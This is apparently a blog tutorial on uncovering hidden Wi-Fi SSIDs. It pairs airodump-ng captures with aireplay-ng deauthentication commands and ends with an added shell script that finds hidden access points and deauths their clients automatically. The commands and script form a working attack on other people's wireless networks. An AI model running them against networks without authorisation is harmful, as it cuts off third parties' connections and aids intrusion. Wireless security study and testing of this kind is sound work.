Find Hidden SSIDs

Hiding the SSID from the beacon is security through obscurity, and just like MAC address blocking it is a worthless form of protection. There is nothing secure about it: the access point and its clients still have to agree on which network they are joining, so the name is sent in the clear in probe requests, probe responses and association requests every time a client connects, and anyone with a card in monitor mode can read it. It is like the wizard hiding behind the curtain. It adds no value to your security, adds complication with no reward, and as a bonus for an attacker it makes your laptops and phones shout the name everywhere they go, because a client that has a hidden network saved has to probe for it by name. Today I am going to show you how easy it is to reveal a hidden SSID using the aircrack-ng suite. First things first: put your card into monitor mode (airmon-ng start wlan1, for example; the interface name it reports is the one to use below), then start airodump-ng with the following command. Replace the interface with your own.

airodump-ng wlan1

The readout should be something like this.

CH  9 ][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2012-05-20 11:09

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 28:EF:01:34:64:91  -29       19        1    0   6  54e  WPA2 CCMP   PSK  linksys
 28:EF:01:35:34:85  -42       17        0    0   6  54e  WPA2 CCMP   PSK  <length:  6>

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 28:EF:01:35:34:85  28:EF:01:23:45:67  -57    0 - 1      0        1

As you can see from the devices found, one of them has a hidden SSID. airodump-ng shows it as <length:  x>, where x is the number of characters in the SSID (some access points beacon a zero-length name instead, so you will not always get a number). Honestly the length does not matter much to us. What we are interested in is the clients attached to that access point. All we have to do is de-authenticate a client; when that client reconnects it sends the SSID through the air in its probe request and association request, and the access point repeats it in the probe response, so airodump-ng can pick it up. Let's run airodump-ng again and filter out everything but the access point in question with this command.

airodump-ng -c 6 --bssid 28:EF:01:35:34:85 wlan1

An explanation of the switches:

-c = channel of the target access point
--bssid = MAC address of the target access point

This is what the airodump-ng readout should look like now.

CH  6 ][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2012-05-20 11:09

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 28:EF:01:35:34:85  -42       17        0    0   6  54e  WPA2 CCMP   PSK  <length:  6>

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 28:EF:01:35:34:85  28:EF:01:23:45:67  -57    0 - 1      0        1

Here we can see the target access point with one client attached. We now need to de-authenticate this client and see if we can catch the SSID during the re-authentication.

Now open a new terminal window and leave airodump-ng running. 

Run this command in the new terminal. 

aireplay-ng -0 30 -a 28:EF:01:35:34:85 -c 28:EF:01:23:45:67 wlan1

The switches for this command are as follows:

-0 = attack mode 0, de-authentication (the number that follows is how many rounds of deauth frames to send; 0 means keep sending until you stop it)
-a = target access point MAC address
-c = target client MAC address (leave it out and the deauth is broadcast to every client of the access point)

Now switch back to the original terminal window that still has airodump-ng running. 

This is what it should now look like. 

CH  6 ][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2012-05-20 11:09

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 28:EF:01:35:34:85  -42       17        0    0   6  54e  WPA2 CCMP   PSK  hacked

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 28:EF:01:35:34:85  28:EF:01:23:45:67  -57    0 - 1      0        1   hacked

As you can see, we now know that the SSID of the target access point is "hacked".

If it does not work the first time, run aireplay-ng again until it does, and watch the airodump-ng window while you do. If the client never comes back (some just give up, or move to another access point) the deauth shows you nothing, and if there is no client at all there is nothing to deauth. In that case just leave airodump-ng running: any client that has the hidden network saved sends probe requests with the name in them whenever it looks for it, and airodump-ng lists those in the Probes column, no deauth needed.
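Putting the whole procedure into one script, as an added example that is not part of the original post: it reads the CSV that airodump-ng writes when you give it --write and --output-format csv, picks out the access points whose ESSID column is empty (the <length: x> ones), lists the clients airodump-ng saw on each, prints the aireplay-ng line from above, and, if you also hand it a monitor-mode interface, runs the deauth and reads the revealed name back out of the CSV. The sample CSV inside is constructed to match the screens above, not a real capture; the mktemp prefix, the 10 and 5 second waits and the wlan1 default are my choices, not anything from the post.

```shell
#!/bin/sh
# Added example, not code from the original post. Drives the hidden-SSID
# workflow from airodump-ng's CSV dump instead of the screen: find APs with
# an empty ESSID, list their clients, build the aireplay-ng deauth command,
# and read the name back once a client re-associates.
# Assumptions: aircrack-ng is installed, the interface is already in monitor
# mode, and airodump-ng runs with "--write PREFIX --output-format csv", which
# produces PREFIX-01.csv in the layout of the sample below.
set -eu

# Constructed sample CSV mirroring the capture in the post (not a real dump).
# Section 1 is the AP table, section 2 the station table.
write_sample_csv() {
  cat > "$1" <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
28:EF:01:34:64:91, 2012-05-20 11:09:00, 2012-05-20 11:09:08, 6, 54, WPA2, CCMP, PSK, -29, 19, 1, 0. 0. 0. 0, 7, linksys,
28:EF:01:35:34:85, 2012-05-20 11:09:00, 2012-05-20 11:09:08, 6, 54, WPA2, CCMP, PSK, -42, 17, 0, 0. 0. 0. 0, 6, ,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
28:EF:01:23:45:67, 2012-05-20 11:09:00, 2012-05-20 11:09:08, -57, 1, 28:EF:01:35:34:85,
AA:BB:CC:DD:EE:FF, 2012-05-20 11:09:00, 2012-05-20 11:09:08, -70, 3, (not associated), linksys
EOF
}

# Print "BSSID CHANNEL ID-LENGTH" for every AP whose ESSID column is empty,
# i.e. a hidden network. Field 13 is what the screen shows as <length: x>;
# an AP that beacons a zero-length name shows up here with 0.
hidden_aps() {  # CSV
  awk -F' *, *' '
    /^Station MAC/ { exit }              # station table: AP section is over
    /^BSSID/ || NF < 13 { next }         # header or blank line
    $14 == "" { print $1, $4, $13 }
  ' "$1"
}

# Print the station MACs seen associated with BSSID $2 (field 6 of section 2).
# "(not associated)" stations are skipped: a deauth needs a real client.
clients_of() {  # CSV BSSID
  awk -F' *, *' -v ap="$2" '
    /^Station MAC/ { in_sta = 1; next }
    in_sta && NF >= 6 && toupper($6) == toupper(ap) { print $1 }
  ' "$1"
}

# The aireplay-ng line from the post. COUNT is rounds of deauth frames
# (default 30 as in the post); 0 would mean "until interrupted".
deauth_cmd() {  # AP CLIENT IFACE [COUNT]
  printf 'aireplay-ng -0 %s -a %s -c %s %s\n' "${4:-30}" "$1" "$2" "$3"
}

# ESSID column for one BSSID. Empty until airodump-ng has seen the name in
# a probe or association frame from a (re)connecting client.
revealed_essid() {  # CSV BSSID
  awk -F' *, *' -v ap="$2" '
    /^Station MAC/ { exit }
    NF >= 13 && toupper($1) == toupper(ap) { print $14; exit }
  ' "$1"
}

# Live path (root, monitor-mode card): lock airodump-ng to the target, deauth
# each client it has seen, then read the ESSID back from the CSV it writes.
reveal_live() {  # IFACE BSSID CHANNEL
  iface=$1; ap=$2; ch=$3
  prefix=$(mktemp -u /tmp/hidden.XXXXXX)
  airodump-ng -c "$ch" --bssid "$ap" --write "$prefix" --output-format csv "$iface" >/dev/null 2>&1 &
  dump=$!
  sleep 10                                  # let it see the clients
  for sta in $(clients_of "$prefix-01.csv" "$ap"); do
    aireplay-ng -0 5 -a "$ap" -c "$sta" "$iface" >/dev/null 2>&1 || true
    sleep 5                                 # give the client time to rejoin
  done
  kill "$dump" 2>/dev/null || true; wait "$dump" 2>/dev/null || true
  revealed_essid "$prefix-01.csv" "$ap"
}

# Usage: reveal.sh CAPTURE-01.csv [IFACE]
# CSV only: list hidden APs, their clients and the deauth commands to run.
# With IFACE: also run the deauth and print the revealed name.
main() {
  csv=$1; iface=${2:-}
  hidden_aps "$csv" | while read -r ap ch len; do
    echo "hidden AP $ap on channel $ch (SSID length $len)"
    clients=$(clients_of "$csv" "$ap")
    if [ -z "$clients" ]; then
      echo "  no associated client: wait for one, or for a probe request"
      continue
    fi
    for sta in $clients; do
      echo "  client $sta -> $(deauth_cmd "$ap" "$sta" "${iface:-wlan1}")"
    done
    if [ -n "$iface" ]; then
      echo "  revealed: $(reveal_live "$iface" "$ap" "$ch")"
    fi
  done
}

if [ $# -gt 0 ]; then main "$@"; fi
```

Run it against a saved dump first (sh reveal.sh capture-01.csv) to see what it would do; the live path needs root and an interface already in monitor mode, and the CSV only fills in the ESSID after airodump-ng has actually seen the name go by, so an empty result means the client has not rejoined yet.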
